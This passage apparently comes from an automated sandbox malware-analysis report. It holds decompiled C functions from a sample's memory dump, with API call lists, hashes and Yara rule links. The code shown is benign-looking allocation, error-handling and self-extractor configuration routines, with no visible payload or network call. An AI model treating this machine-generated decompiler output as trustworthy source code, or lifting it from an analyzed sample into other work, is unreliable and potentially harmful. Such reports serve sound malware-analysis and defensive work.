					 *_t20 = _a12;
				}
				if(_t12 != 0) {
					return 0;
				}
				_t13 = GetLastError();
				__eflags =  *(_t24 + 0x1c);
				if( *(_t24 + 0x1c) != 0) {
					return  *((intOrPtr*)( *( *(_t24 + 0x1c))))( *((intOrPtr*)(_t24 + 0x20)), _t13);
				}
				__eflags = _t13;
				if(__eflags == 0) {
					return 0x80004005;
				}
				if(__eflags > 0) {
					_t15 = _t13 & 0x0000ffff | 0x80070000;
					__eflags = _t15;
					return _t15;
				}
				return _t13;
			}








                                          0x00414ef5
                                          0x00414efb
                                          0x00414f05
                                          0x00414f0a
                                          0x00414f0f
                                          0x00414f14
                                          0x00414f14
                                          0x00414f18
                                          0x00000000
                                          0x00414f1a
                                          0x00414f1e
                                          0x00414f24
                                          0x00414f28
                                          0x00000000
                                          0x00414f33
                                          0x00414f37
                                          0x00414f39
                                          0x00000000
                                          0x00414f3b
                                          0x00414f42
                                          0x00414f49
                                          0x00414f49
                                          0x00000000
                                          0x00414f49
                                          0x00414f50

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?), ref: 00414F1E
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: bef10e7e2a07b9f5c5ee5c354b4214a9f3a8dc7b1ff6031b8d50112c379913c8
                                          • Instruction ID: b1376db512650cee24e8a0985b829a0f1c4315c93205b2e563ae2ffb9e13b3f5
                                          • Opcode Fuzzy Hash: bef10e7e2a07b9f5c5ee5c354b4214a9f3a8dc7b1ff6031b8d50112c379913c8
                                          • Instruction Fuzzy Hash: 68F0697120021AABCB20CF10CC00AE777A9BF80324F14456AB806CB360D739E897DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004145F1, Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E004145F1(signed int* __ecx, void* __eflags, signed int _a4) {
				signed int _t12;
				signed int _t19;
				signed int _t21;

				_t21 = _a4;
				 *__ecx =  *__ecx & 0x00000000;
				_t19 = 2;
				_t12 = (_t21 + 1) * _t19;
				_push( ~(0 | __eflags > 0x00000000) | _t12); // executed
				L0041C16C(); // executed
				__ecx[1] = _t21;
				__ecx[2] = _t21;
				 *__ecx = _t12;
				return _t12;
			}






                                          0x004145f3
                                          0x004145f9
                                          0x00414600
                                          0x00414604
                                          0x0041460d
                                          0x0041460e
                                          0x00414614
                                          0x00414617
                                          0x0041461b
                                          0x0041461e

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: b60de331195480ee16010183974e33a4c9ed5d3fc8d927df9664fc67f0053f17
                                          • Instruction ID: d4bf1e77843ac4ffc9d6de96a583b5b6222411ff98e089cd5882ee9a91c2c0ea
                                          • Opcode Fuzzy Hash: b60de331195480ee16010183974e33a4c9ed5d3fc8d927df9664fc67f0053f17
                                          • Instruction Fuzzy Hash: A8E012735452116FD3288F2ED507A97F7E8EFD0720F14C92FE59AC72A0DAB4A8818A54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040287B, Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E0040287B(void* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t3;
				void* _t9;
				void* _t10;

				_t9 = __edx;
				_push(0x18);
				_t10 = __ecx; // executed
				L0041C16C(); // executed
				if(__eax == 0) {
					_t3 = 0;
				} else {
					_t3 = E00402544(__eax, _a4);
				}
				return E0041B205(_t10, _t9, _t3);
			}






                                          0x0040287b
                                          0x0040287c
                                          0x0040287e
                                          0x00402880
                                          0x00402888
                                          0x00402897
                                          0x0040288a
                                          0x00402890
                                          0x00402890
                                          0x004028a2

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@
                                          • String ID:
                                          • API String ID: 1033339047-0
                                          • Opcode ID: b306a9075f87c046829b446e6b913b62a4123f536a9e901663e4365a709dde56
                                          • Instruction ID: ab72d40478e811afedcfbbedf7c0c76e7f17da6d593c58ae3af9d4d4ec47094f
                                          • Opcode Fuzzy Hash: b306a9075f87c046829b446e6b913b62a4123f536a9e901663e4365a709dde56
                                          • Instruction Fuzzy Hash: ADD0227634073121CA5831325D29ABF49844F81724B05883FB405E62D1CEBDCC82829D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE40, Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041BE40(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                          0x0041be42
                                          0x0041be51
                                          0x0041be57
                                          0x0041be44
                                          0x0041be46
                                          0x0041be46

                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004152E1), ref: 0041BE51
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 22032155c9183e28adb1f52440ec07b95b4e3d2f57ec60f8ae89b3c08762bae8
                                          • Instruction ID: acb135da47796bf22734778030a0ffbf7a4206f64c6a4a795cd6af5e279b245b
                                          • Opcode Fuzzy Hash: 22032155c9183e28adb1f52440ec07b95b4e3d2f57ec60f8ae89b3c08762bae8
                                          • Instruction Fuzzy Hash: EBB012F07D134035FF684320CC0BFE72410A344B4BF104068B301E90C4E7D05440505C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE10, Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041BE10(int __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = malloc(__ecx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                          0x0041be12
                                          0x0041be18
                                          0x0041be21
                                          0x0041be14
                                          0x0041be16
                                          0x0041be16

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: 66cf8d5545a740dad15543452bf8420ea65b41da3c9faaad57c398a04622ebbf
                                          • Instruction ID: a99900dced4b3d94408e193d7e854b8781f3078c90807f01ec2a5ee1b4dfafb1
                                          • Opcode Fuzzy Hash: 66cf8d5545a740dad15543452bf8420ea65b41da3c9faaad57c398a04622ebbf
                                          • Instruction Fuzzy Hash: B2B012F051110102DE1C07347C040D732506650607BC048B8B402C0210F729C425504D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE80, Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041BE80(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}




                                          0x0041be82
                                          0x0041be88
                                          0x0041be91
                                          0x0041be84
                                          0x0041be86
                                          0x0041be86

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: malloc
                                          • String ID:
                                          • API String ID: 2803490479-0
                                          • Opcode ID: ca24d3bf4cc2db8d3e160cb20dd14b889eabe10d449740db5881849cc31842ca
                                          • Instruction ID: 9d0265dfb37a9864b687b7e6398dff5a3f2c0bb0c41e27f4d46130ed5ce6b560
                                          • Opcode Fuzzy Hash: ca24d3bf4cc2db8d3e160cb20dd14b889eabe10d449740db5881849cc31842ca
                                          • Instruction Fuzzy Hash: A2B012E8D4010102DA0407347C040D33272B7E06067C4C8B4B40180114FB38C024A04D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE60, Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041BE60(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}





                                          0x0041be62
                                          0x0041be6c
                                          0x00000000
                                          0x0041be6c
                                          0x0041be72

                                          APIs
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,004152DA), ref: 0041BE6C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: e232632fe293ff23287d9c76e63ac30f1885b462abd3b624660c24e6dc4983ca
                                          • Instruction ID: 5a0e45df0b9e3ce07833d2d307a6ca80aa43b70fd88c11b2272045b6d040e14e
                                          • Opcode Fuzzy Hash: e232632fe293ff23287d9c76e63ac30f1885b462abd3b624660c24e6dc4983ca
                                          • Instruction Fuzzy Hash: CDB012B074130062ED3803210D05BD727005701701F1080183B01640C08798E404854C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BE30, Relevance: 1.3, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: 5bb76444f12f6ac46b839af03aa649dedf6af210799dfe73033db5ebb4548707
                                          • Instruction ID: 87b19333b2ef4116d6254c4bc8fef081bf6be047992dbd34729973d037981491
                                          • Opcode Fuzzy Hash: 5bb76444f12f6ac46b839af03aa649dedf6af210799dfe73033db5ebb4548707
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BEA1, Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: free
                                          • String ID:
                                          • API String ID: 1294909896-0
                                          • Opcode ID: fe7d6081d7d7cee6f39f354d3d23d24cdc014e2121fbf16be8563e7553237ba4
                                          • Instruction ID: 4f63a7a6c6c64434434c40c10d9112b548cdf13d56a46577236c02296c3fb01f
                                          • Opcode Fuzzy Hash: fe7d6081d7d7cee6f39f354d3d23d24cdc014e2121fbf16be8563e7553237ba4
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00405729, Relevance: 40.4, APIs: 3, Strings: 20, Instructions: 185stringCOMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00405729(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t14;
				WCHAR* _t15;
				signed short* _t16;
				signed int _t18;
				void* _t24;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				signed int _t31;
				signed int _t35;
				intOrPtr _t41;
				intOrPtr _t45;
				void* _t68;
				void* _t73;
				void* _t76;
				intOrPtr _t98;
				void* _t99;
				intOrPtr* _t104;

				_push(__ecx);
				_t98 = E00404F59();
				if(_t98 != 0) {
					E00414864(0x42285c, _t98);
					_t73 = 4;
					E00414922(0x42285c, E00403CE0(_t73));
					_t41 =  *0x42285c; // 0x9def98
					 *0x422760 = _t41;
					E00414864(0x422884, _t98);
					_t76 = 0x29;
					E00414922(0x422884, E00403CE0(_t76));
					_t45 =  *0x422884; // 0x9d12c0
					 *0x42274c = _t45;
					 *0x422738 = _t98;
				}
				_t12 = E00404F59();
				if(_t12 != 0) {
					 *0x422760 = _t12;
				}
				_t13 = E00404F59();
				if(_t13 != 0) {
					 *0x42274c = _t13;
				}
				_t14 = E00404F59();
				if(_t14 != 0) {
					 *0x42273c = _t14;
				}
				_t15 = E00404F59();
				if(_t15 != 0 && lstrcmpiW(_t15, L"no") == 0) {
					 *0x422770 = 2;
				}
				_t16 = E00404F59();
				_t99 = 0x30;
				if(_t16 != 0) {
					_t35 =  *_t16 & 0x0000ffff;
					if(_t35 >= _t99 && _t35 <= 0x32) {
						 *0x422770 = _t35 - _t99;
					}
				}
				if(E00404F59() != 0) {
					E00405601(_t17);
				}
				_v8 = _v8 & 0x00000000;
				while(1) {
					_t18 = E00404F59();
					if(_t18 == 0) {
						break;
					}
					_v8 = _v8 + 1;
					E004055BC(_t18);
				}
				_v8 = _v8 & _t18;
				while(E00404F59() != 0) {
					_v8 = _v8 + 1;
					E004055E3(_t20);
				}
				 *0x422750 = E00404F59();
				 *0x422758 = E00404F59();
				_t24 = E00404F59();
				_t104 = __imp___wtol;
				if(_t24 != 0) {
					 *0x422460 =  *_t104(_t24);
				}
				_t25 = E00404F59();
				if(_t25 != 0) {
					 *0x422464 =  *_t104(_t25);
				}
				_t26 = E00404F59();
				if(_t26 != 0) {
					 *0x422754 = _t26;
				}
				_t27 = E00404F59();
				if(_t27 != 0) {
					 *0x422748 = _t27;
				}
				_t28 = E00404F59();
				if(_t28 != 0) {
					 *0x422744 = _t28;
				}
				_t29 = E00404F59();
				if(_t29 == 0) {
					_t29 =  *0x422738; // 0x22109c0
				}
				 *0x422764 = _t29;
				_t30 = E00404F59();
				if(_t30 == 0) {
					_t68 = 0x2c;
					_t30 = E00403CE0(_t68);
				}
				 *0x422768 = _t30;
				_t31 = E00404F59();
				if(_t31 != 0) {
					_t31 =  *_t31 & 0x0000ffff;
					if(_t31 >= _t99 && _t31 <= 0x39) {
						_t31 = _t31 - _t99;
						 *0x42276c = _t31;
					}
				}
				return _t31;
			}



























                                          0x0040572c
                                          0x0040573b
                                          0x0040573f
                                          0x00405749
                                          0x00405750
                                          0x00405759
                                          0x0040575e
                                          0x0040576b
                                          0x00405770
                                          0x00405777
                                          0x00405780
                                          0x00405785
                                          0x0040578a
                                          0x0040578f
                                          0x0040578f
                                          0x0040579c
                                          0x004057a3
                                          0x004057a5
                                          0x004057a5
                                          0x004057b1
                                          0x004057b8
                                          0x004057ba
                                          0x004057ba
                                          0x004057c6
                                          0x004057cd
                                          0x004057cf
                                          0x004057cf
                                          0x004057db
                                          0x004057e2
                                          0x004057f4
                                          0x004057f4
                                          0x00405805
                                          0x0040580c
                                          0x0040580f
                                          0x00405811
                                          0x00405817
                                          0x00405820
                                          0x00405820
                                          0x00405817
                                          0x00405833
                                          0x00405837
                                          0x00405837
                                          0x0040583c
                                          0x00405851
                                          0x00405856
                                          0x0040585d
                                          0x00000000
                                          0x00000000
                                          0x00405847
                                          0x0040584c
                                          0x0040584c
                                          0x0040585f
                                          0x00405873
                                          0x00405869
                                          0x0040586e
                                          0x0040586e
                                          0x00405894
                                          0x004058a5
                                          0x004058aa
                                          0x004058af
                                          0x004058b7
                                          0x004058bd
                                          0x004058bd
                                          0x004058c9
                                          0x004058d0
                                          0x004058d6
                                          0x004058d6
                                          0x004058e2
                                          0x004058e9
                                          0x004058eb
                                          0x004058eb
                                          0x004058f7
                                          0x004058fe
                                          0x00405900
                                          0x00405900
                                          0x0040590c
                                          0x00405913
                                          0x00405915
                                          0x00405915
                                          0x00405921
                                          0x00405928
                                          0x0040592a
                                          0x0040592a
                                          0x00405936
                                          0x0040593b
                                          0x00405942
                                          0x00405946
                                          0x00405947
                                          0x00405947
                                          0x00405953
                                          0x00405958
                                          0x0040595f
                                          0x00405961
                                          0x00405967
                                          0x0040596e
                                          0x00405970
                                          0x00405970
                                          0x00405967
                                          0x00405978

                                          APIs
                                          • lstrcmpiW.KERNEL32(00000000,0041EAFC,?,00422148,?,?,004065DA,?,00000000), ref: 004057EA
                                          • _wtol.MSVCRT(00000000,?,00422148,?,?,004065DA,?), ref: 004058BA
                                          • _wtol.MSVCRT(00000000,?,00422148,?,?,004065DA,?), ref: 004058D3
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32(?,?,00000000), ref: 00403D2F
                                            • Part of subcall function 00403CE0: wsprintfW.USER32 ref: 00403D40
                                            • Part of subcall function 00403CE0: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403D55
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32 ref: 00403D5A
                                            • Part of subcall function 00403CE0: ??2@YAPAXI@Z.MSVCRT ref: 00403D75
                                            • Part of subcall function 00403CE0: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403D88
                                            • Part of subcall function 00403CE0: GetLastError.KERNEL32 ref: 00403D8F
                                            • Part of subcall function 00403CE0: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403DA4
                                            • Part of subcall function 00403CE0: ??3@YAXPAX@Z.MSVCRT ref: 00403DB4
                                            • Part of subcall function 00403CE0: SetLastError.KERNEL32(?), ref: 00403DDB
                                            • Part of subcall function 00403CE0: lstrlenA.KERNEL32(0041E930), ref: 00403E11
                                            • Part of subcall function 00403CE0: ??2@YAPAXI@Z.MSVCRT ref: 00403E2C
                                            • Part of subcall function 00403CE0: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403E5E
                                            • Part of subcall function 004055E3: _wtol.MSVCRT(00000000,00000030,GUIFlags,00405851,?,00422148,?,?,004065DA,?), ref: 00405580
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$??2@_wtol$??3@EnvironmentVariablelstrcmpimemcpy$InfoLocalelstrlenwsprintf
                                          • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$VolumeNameStyle$WarningTitle$\(B
                                          • API String ID: 730802180-3274096255
                                          • Opcode ID: 4913305cdd4d8d816ceef7353569ed64abbb5de1f3083bffcd8f5a9aa583c26b
                                          • Instruction ID: 01810da2686b2e6648b7138d9e83176c772a0bf1dd2896189787ed4a5fe29933
                                          • Opcode Fuzzy Hash: 4913305cdd4d8d816ceef7353569ed64abbb5de1f3083bffcd8f5a9aa583c26b
                                          • Instruction Fuzzy Hash: 4B5192F1F00612AAD728FB775A1166B66D6DBC4344B44C03F9A09E72D5EFBCC8428A1C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403CE0, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 148stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00403CE0(WCHAR* __ecx) {
				WCHAR* _v8;
				long _v12;
				long _v16;
				short _v104;
				short _v168;
				WCHAR* _t52;
				short* _t55;
				WCHAR* _t60;
				int _t61;
				WCHAR* _t65;
				long _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				int _t71;
				intOrPtr* _t73;
				char* _t78;
				WCHAR* _t79;
				signed int _t94;
				signed int _t96;
				int _t101;
				WCHAR* _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t107;

				_t79 = __ecx;
				_t103 = 0;
				_v8 = __ecx;
				_t107 =  *0x422158; // 0x1
				if(_t107 == 0) {
					L4:
					_t104 = _t103 << 4;
					if( *((intOrPtr*)(_t104 + 0x422158)) != 0) {
						_v16 = GetLastError();
						wsprintfW( &_v104, L"SfxString%d", _v8);
						_v12 = GetEnvironmentVariableW( &_v104, 0, 0);
						__eflags = GetLastError();
						if(__eflags != 0) {
							L17:
							SetLastError(_v16);
							_t28 = _t104 + 0x422164; // 0x0
							_t52 =  *_t28;
							__eflags = _t52;
							if(_t52 == 0) {
								_t29 = _t104 + 0x42215c; // 0x41e930
								_t78 =  *_t29;
								__eflags =  *(_t104 + 0x422160) - _t52;
								if(__eflags != 0) {
									__eflags = E00403C85(_t52) -  *0x41ea18; // 0x419
									if(__eflags == 0) {
										_t31 = _t104 + 0x422160; // 0x41e848
										_t78 =  *_t31;
									}
								}
								_t32 = lstrlenA(_t78) + 1; // 0x1
								_t101 = _t32;
								_t94 = 2;
								_t33 = _t101 + 2; // 0x3
								_t55 = _t33 * _t94;
								_push( ~(0 | __eflags > 0x00000000) | _t55);
								L0041C16C();
								__eflags =  *0x42211c - 0xffffffff;
								 *(_t104 + 0x422164) = _t55;
								if( *0x42211c == 0xffffffff) {
									 *0x42211c =  *0x42211c & 0x00000000;
									_t60 = GetLocaleInfoW( *0x422730 & 0x0000ffff, 0x1004,  &_v168, 0x1f);
									__eflags = _t60;
									if(_t60 > 0) {
										_t61 =  &_v168;
										__imp___wtol(_t61);
										 *0x42211c = _t61;
									}
								}
								_t43 = _t101 + 1; // 0x2
								_t44 = _t104 + 0x422164; // 0x0
								MultiByteToWideChar( *0x42211c, 0, _t78, _t101,  *_t44, _t43);
								_t45 = _t104 + 0x422164; // 0x0
								_t52 =  *_t45;
							}
							return _t52;
						}
						_t96 = 2;
						_t65 = (_v12 + 2) * _t96;
						_push( ~(0 | __eflags > 0x00000000) | _t65);
						L0041C16C();
						_v8 = _t65;
						_t67 = GetEnvironmentVariableW( &_v104, _t65, _v12 + 1);
						__eflags = _t67 - _v12;
						if(_t67 > _v12) {
							L14:
							_push(_v8);
							L15:
							L0041C160();
							L16:
							goto L17;
						}
						_t68 = GetLastError();
						__eflags = _t68;
						if(_t68 != 0) {
							goto L14;
						}
						_t20 = _t104 + 0x422164; // 0x0
						_t69 =  *_t20;
						__eflags = _t69;
						if(_t69 == 0) {
							 *(_t104 + 0x422164) = _v8;
							goto L17;
						}
						_t102 = _v8;
						_t71 = lstrcmpiW(_t69, _t102);
						__eflags = _t71;
						if(_t71 == 0) {
							_push(_t102);
							goto L15;
						}
						_t22 = _t104 + 0x422164; // 0x0
						_push( *_t22);
						L0041C160();
						 *(_t104 + 0x422164) = _t102;
						goto L16;
					}
					return 0x41da3c;
				} else {
					_t73 = 0x422158;
					while( *_t73 != _t79) {
						_t103 = _t103 + 1;
						_t2 = (_t103 << 4) + 0x422158; // 0x30000000
						_t73 = _t2;
						if( *_t73 != 0) {
							continue;
						}
						goto L4;
					}
					goto L4;
				}
			}



























                                          0x00403ce0
                                          0x00403ced
                                          0x00403cef
                                          0x00403cf2
                                          0x00403cf8
                                          0x00403d13
                                          0x00403d13
                                          0x00403d1c
                                          0x00403d34
                                          0x00403d40
                                          0x00403d57
                                          0x00403d5c
                                          0x00403d5e
                                          0x00403dd8
                                          0x00403ddb
                                          0x00403de1
                                          0x00403de1
                                          0x00403de7
                                          0x00403de9
                                          0x00403def
                                          0x00403def
                                          0x00403df5
                                          0x00403dfb
                                          0x00403e02
                                          0x00403e08
                                          0x00403e0a
                                          0x00403e0a
                                          0x00403e0a
                                          0x00403e08
                                          0x00403e17
                                          0x00403e17
                                          0x00403e1e
                                          0x00403e1f
                                          0x00403e22
                                          0x00403e2b
                                          0x00403e2c
                                          0x00403e31
                                          0x00403e39
                                          0x00403e3f
                                          0x00403e41
                                          0x00403e5e
                                          0x00403e64
                                          0x00403e66
                                          0x00403e68
                                          0x00403e6f
                                          0x00403e76
                                          0x00403e76
                                          0x00403e66
                                          0x00403e7b
                                          0x00403e7f
                                          0x00403e8f
                                          0x00403e95
                                          0x00403e95
                                          0x00403e95
                                          0x00000000
                                          0x00403e9b
                                          0x00403d6a
                                          0x00403d6b
                                          0x00403d74
                                          0x00403d75
                                          0x00403d81
                                          0x00403d88
                                          0x00403d8a
                                          0x00403d8d
                                          0x00403dcf
                                          0x00403dcf
                                          0x00403dd2
                                          0x00403dd2
                                          0x00403dd7
                                          0x00000000
                                          0x00403dd7
                                          0x00403d8f
                                          0x00403d91
                                          0x00403d93
                                          0x00000000
                                          0x00000000
                                          0x00403d95
                                          0x00403d95
                                          0x00403d9b
                                          0x00403d9d
                                          0x00403dc7
                                          0x00000000
                                          0x00403dc7
                                          0x00403d9f
                                          0x00403da4
                                          0x00403daa
                                          0x00403dac
                                          0x00403dc1
                                          0x00000000
                                          0x00403dc1
                                          0x00403dae
                                          0x00403dae
                                          0x00403db4
                                          0x00403db9
                                          0x00000000
                                          0x00403db9
                                          0x00000000
                                          0x00403cfa
                                          0x00403cfa
                                          0x00403cff
                                          0x00403d03
                                          0x00403d09
                                          0x00403d09
                                          0x00403d11
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403d11
                                          0x00000000
                                          0x00403cff

                                          APIs
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00403D2F
                                          • wsprintfW.USER32 ref: 00403D40
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403D55
                                          • GetLastError.KERNEL32 ref: 00403D5A
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00403D75
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403D88
                                          • GetLastError.KERNEL32 ref: 00403D8F
                                          • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403DA4
